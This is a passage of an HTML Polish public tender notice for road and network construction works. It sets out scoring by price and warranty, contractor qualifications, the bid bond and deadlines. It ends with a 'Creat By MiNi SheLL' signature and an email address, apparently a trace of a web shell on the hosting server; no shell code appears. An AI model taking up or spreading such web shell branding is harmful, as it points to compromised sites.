drogowego.<br/>Zakres robót, stałej organizacji ruchu drogowego określony jest w zatwierdzonych projektach. Dla realizacji prac inwestycyjnych na odcinku określonym w zadaniu 1, należy wykorzystać opracowany i zatwierdzony projekt czasowej organizacji ruchu, dla zadania 2 stosowny projekt wykona Wykonawca robót.<br/>Dalsza część w SWZ w rozdziale 4. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233120-6 - Roboty w zakresie budowy dróg</p> <p class="mb-0">45233220-7 - Roboty w zakresie nawierzchni dróg</p> <p class="mb-0">45111000-8 - Roboty w zakresie burzenia, roboty ziemne</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45234129-6 - Roboty budowlane w zakresie torów kolei miejskiej</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45112000-5 - Roboty w zakresie usuwania gleby</p> <p class="mb-0">32400000-7 - Sieci</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">6 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert, które nie zostały odrzucone, na podstawie następujących kryteriów oceny ofert:<br/>1) cena (C) - waga kryterium 60% = 60pkt <br/>2) długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia (G) – waga kryterium- 40% = 40pkt<br/>RAZEM 100 % = 100pkt<br/>Zamawiający dokona oceny ofert przyznając punkty w ramach poszczególnych kryteriów oceny ofert, przyjmując zasadę, że 1% = 1 punkt.<br/>W ramach kryterium „cena” (C) oceniana będzie cena łączna brutto za wykonanie całości zamówienia podana w formularzu oferty. W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/>	C =	C n	x 60pkt<br/> C o	<br/>gdzie: <br/>	C	– ilość punktów w kryterium cena<br/>	C o	– cena oferty badanej<br/>	C n	– najniższa cena ofertowa spośród ofert nieodrzuconych<br/>W ramach kryterium „Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia” liczone w okresach miesięcznych:<br/>W przypadku zaoferowania minimalnej długości okresu gwarancji tj. 36 miesięcy, Wykonawca otrzyma zero (0) punktów.<br/>W przypadku zaoferowania maksymalnej długości okresu gwarancji tj. 60 miesięcy, Wykonawca otrzyma czterdzieści (40) punktów.<br/>W przypadku zaoferowania gwarancji pomiędzy 36 a 60 miesięcy wykonawca otrzyma pkt wg wzoru:<br/><br/> G o<br/>G =	----------- x 40 pkt<br/> G max.<br/><br/>Gdzie:<br/>G - wartość punktowa, którą należy wyznaczyć,<br/>Go	- okres gwarancji podany w badanej ofercie,<br/>G max. - najdłuższy oferowany okres gwarancji,<br/><br/>Zamawiający określa minimalną oraz maksymalną długość okresu gwarancji, w przedziale od 36 miesięcy do 60 miesięcy. W przypadku zaoferowania przez Wykonawcę długości krótszego niż 36 miesięcy, Zamawiający ofertę odrzuci. W przypadku, gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego okresu gwarancji Zamawiający przyjmie, że Wykonawca nie oferuje gwarancji i ofertę odrzuci. Wykonawca może zaproponować długość okresu gwarancji dłuższy niż wyznaczony maksymalny 60 miesięcy, jednak w tym przypadku Zamawiający przyjmie do obliczeń wartość 60 miesięcy – najdłuższy przyjęty w kryterium oceny ofert „Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia”. Wykonawcy oferują długości okresu gwarancji w pełnych miesiącach (w przedziale od 36 do 60 miesięcy).<br/>Deklarowany w formularzu ofertowym okres będzie wprowadzony do umowy. Zamawiający określił ogólne warunki w karcie gwarancyjnej wykonanych robót stanowiącej załącznik umowy. Wady ujawnione w okresie gwarancji będą usuwane przez Wykonawcę na zasadach opisanych w karcie gwarancji.<br/>Obliczenie łącznej liczby punktów uzyskanych przez Wykonawcę (spośród ofert podlegających ocenie) zostanie wyliczone na podstawie sumy uzyskanych punktów w kryteriach opisanych powyżej zgodnie z wzorem:<br/>P = C + G<br/>P - łączna liczba punktów (suma) przyznanych Wykonawcy w ramach wszystkich kryteriów<br/>C - łączna liczba punktów przyznanych Wykonawcy w kryterium „Cena”<br/>TP - łączna liczba punktów przyznanych Wykonawcy w kryterium „Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia” <br/>Oferta może uzyskać maksymalnie 100 punktów w kryteriach oceny ofert. <br/>Zgodnie z art. 248 ustawy Pzp jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę, która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.<br/> Jeżeli oferty otrzymały taką samą ocenę w kryterium o najwyższej wadze, Zamawiający wybiera ofertę z najniższą ceną.<br/>Jeżeli nie można dokonać wyboru oferty w sposób, o którym mowa w ust. 2, Zamawiający wzywa Wykonawców, którzy złożyli te oferty, do złożenia w terminie określonym przez Zamawiającego ofert dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Długość okresu gwarancji na roboty budowlane oraz zamontowane materiały i urządzenia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> A)	Wykonawca winien wykazać, że wykonał należycie i zgodnie z przepisami prawa budowlanego i prawidłowo ukończył nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie: co najmniej jedno zamówienie, które polegało na wykonaniu roboty budowlanej, związanej z budową/przebudową drogi publicznej o wartości robót co najmniej 1 500 000,00 PLN brutto<br/>oraz dołączy dowody (referencje) określające, czy robota budowlana została wykonana lub w przypadku świadczeń okresowych lub ciągłych jest wykonywana należycie. <br/>B)	Wykonawca dysponuje kadrą techniczną posiadającą odpowiednie uprawnienia budowlane tj. <br/>1). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika budowy)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności inżynieryjnej drogowej, których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia<br/>DOŚWIADCZENIE: w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie pełnił funkcję kierownika budowy przy realizacji robót która polegała na budowie, przebudowie lub rozbudowie drogi o nawierzchni bitumicznej o wartości robót nie mniejszej niż 1.000.000,00 zł <br/>2). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci wodociągowych i kanalizacyjnych których zakres uprawnia go do kierowania robotami objętymi przedmiotem Zamówienia<br/>3).STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie instalacji i urządzeń: elektrycznych i elektroenergetycznych których zakres uprawnia go do kierowania robotami objętymi przedmiotem Zamówienia<br/>4). STANOWISKO: minimum jedna osoba (która będzie pełnić funkcję kierownika robót)<br/>UPRAWNIENIA: uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w specjalności inżynieryjnej kolejowej których zakres uprawnia go do kierowania robotami objętymi przedmiotem zamówienia <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca jest zobowiązany wnieść wadium w wysokości 25 000,00 PLN (dwadzieścia pięć tysięcy złotych 00/100) <br/>Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.<br/>Wadium wnoszone w pieniądzu należy wpłacić przelewem na następujący rachunek bankowy Zamawiającego: Bank Spółdzielczy w Lubyczy Królewskiej<br/>Nr konta: 36 9617 0005 0000 1111 2000 0002<br/>z adnotacją „Wadium – Znak sprawy: ZP.271.1.5.2023”*<br/>Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uzna wadium, które zostanie zaksięgowane na rachunku bankowym Zamawiającego przed upływem terminu składania ofert.<br/>Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej – przed upływem terminu składania ofert.<br/>W przypadku wnoszenia wadium w formie gwarancji bankowej lub ubezpieczeniowej, lub poręczenia gwarancja lub poręczenie musi być nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie zamawiającego, sporządzone zgodnie z obowiązującymi przepisami i powinna zawierać następujące elementy:<br/>a)	nazwę: dającego zlecenie (Wykonawcy), beneficjenta gwarancji\poręczenia (Zamawiającego), gwaranta lub poręczyciela oraz wskazanie ich siedzib,<br/>b)	kwotę wadium<br/>c)	termin ważności gwarancji\poręczenia w formule: „od dnia…..-do dnia…..”,<br/>d)	zobowiązanie gwaranta\poręczyciela do zapłacenia kwoty wskazanej w gwarancji\poręczeniu na pierwsze żądanie Zamawiającego w sytuacjach zatrzymania wadium określonych w przepisach ustawy.<br/>Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania z ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 ustawy Pzp.<br/>Zasady dokonywania zatrzymania i zwrotu wadium określono w przepisach art. 98 ustawy Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zgodnie z projektowanymi zapisami umowy, która stanowi załącznik nr 2 do SWZ. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz przypadków, o których mowa w art. 454 i 455 ustawy – Prawo zamówień publicznych, strony dopuszczają<br/>możliwość wprowadzania zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w<br/>przypadku wystąpienia którejkolwiek z następujących okoliczności:<br/>1) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>okoliczności siły wyższej, przez którą należy rozumieć zdarzenia niezależne od żadnej ze stron, zewnętrzne, niemożliwe do<br/>zapobieżenia, które nastąpiło po dniu wejścia w życie umowy, w szczególności: wojny, akty terroryzmu, klęski żywiołowe,<br/>strajki oraz akty władzy i administracji publicznej, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni,<br/>odpowiadającą okresowi występowania okoliczności siły wyższej;<br/>2) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku skierowania przez<br/>Zamawiającego do Wykonawcy pisemnego żądania wstrzymania robót budowlanych, stanowiących przedmiot zamówienia<br/>lub wydania zakazu prowadzenia robót budowlanych, stanowiących przedmiot zamówienia przez organ administracji<br/>publicznej lub eksploatorów infrastruktury, o ile żądanie lub wydanie zakazu nie nastąpiło z przyczyn, za które Wykonawca<br/>ponosi odpowiedzialność, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni, odpowiadającą<br/>okresowi na jaki Wykonawcy nakazano wstrzymanie robót budowlanych lub zakazano prowadzenia robót budowlanych;<br/>3) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia kolizji z<br/>instalacjami wewnętrznymi i zewnętrznymi nieujawnionymi w dokumentacji projektowej, lub innymi robotami prowadzonymi<br/>przez innego Wykonawcę, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną Wykonawcy<br/>na usunięcie kolizji z instalacjami wewnętrznymi nieujawnionymi w dokumentacji projektowej lub o liczbę dni niezbędnych do<br/>wykonania robót przez innego Wykonawcę – o ile usunięcie kolizji wymagać będzie przedłużenia terminu realizacji;<br/>4) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>konieczności wprowadzenia w dokumentacji projektowej zmian, powodujących wstrzymanie lub przerwanie robót<br/>budowlanych, stanowiących przedmiot zamówienia, przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę<br/>dni niezbędną do wprowadzenia zmian w dokumentacji projektowej oraz do przeprowadzenia uzgodnień (ustaleń) z<br/>właściwymi organami, uzyskania opinii właściwych organów oraz wydania decyzji przez właściwe organy, przy czym<br/>wprowadzenie w dokumentacji projektowej zmian nie może skutkować zwiększeniem (zmianą) zakresu świadczenia<br/>Wykonawcy zawartego w ofercie, stanowiącej Załącznik Nr 3 do umowy oraz zwiększeniem wynagrodzenia Wykonawcy, o<br/>którym mowa w § 3 ust. 1;<br/>5) przedłużenie terminu realizacji zamówienia, o którym mowa w § 2 ust. 1, może nastąpić w przypadku wystąpienia<br/>warunków geologicznych lub hydrologicznych odmiennych od założonych w dokumentacji projektowej i powodujących<br/>konieczność wstrzymania robót lub konieczność ich wykonania przy wykorzystaniu odmiennych od zaprojektowanych<br/>rozwiązań technicznych, , przy czym przedłużenie terminu realizacji zamówienia nastąpi o liczbę dni niezbędną do<br/>wyeliminowania utrudnień związanych z ich wystąpieniem,<br/>6) przedłużenia terminu realizacji zamówienia, o którym mowa w § 2 ust.1, może nastąpić w zakresie niezbędnym do<br/>wykonania robót zleconych na podstawie art. 455 ust. 1 pkt 1, 3, 4 lub ust. 2 ustawy Prawo zamówień publicznych,<br/>7) zmiana terminu wykonania zamówienia lub zakresu świadczeń lub sposobu wykonywania zamówienia może nastąpić w<br/>przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym bezpośredni wpływ na termin<br/>realizacji przedmiotu zamówienia lub zakres świadczeń stron umowy lub sposób jej wykonywania. CD w postanowieniach umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem platformy zakupowej. Składając ofertę w postaci elektronicznej Ofertę należy złożyć na Platformie pod adresem: https://belzec.ezamawiajacy.pl,w zakładce „OFERTY&#34;</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-15 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com